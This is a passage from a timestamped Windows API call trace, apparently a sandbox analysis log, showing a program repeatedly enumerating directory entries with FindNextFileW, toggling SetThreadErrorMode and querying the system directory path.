ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.840] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.840] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.840] CoTaskMemFree (pv=0x4e1c10) [0147.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.842] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.842] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.843] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.844] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.845] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.845] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.845] CoTaskMemFree (pv=0x4e1c10) [0147.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.848] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.848] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.851] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.851] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.851] CoTaskMemFree (pv=0x4e1c10) [0147.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.852] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.854] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.854] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.855] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.855] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.855] CoTaskMemFree (pv=0x4e1c10) [0147.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.856] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.856] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.857] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.857] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.858] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.858] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.858] CoTaskMemFree (pv=0x4e1c10) [0147.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.860] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.860] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.861] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.862] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.862] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.862] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.863] CoTaskMemFree (pv=0x4e1c10) [0147.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.863] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.864] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.865] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.865] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.866] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.866] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.866] CoTaskMemFree (pv=0x4e1c10) [0147.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.867] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.867] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.868] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.869] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.869] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.870] CoTaskMemFree (pv=0x4e1c10) [0147.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.870] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.871] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.872] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.872] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.873] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.873] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.873] CoTaskMemFree (pv=0x4e1c10) [0147.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.874] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.874] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.875] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.876] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, 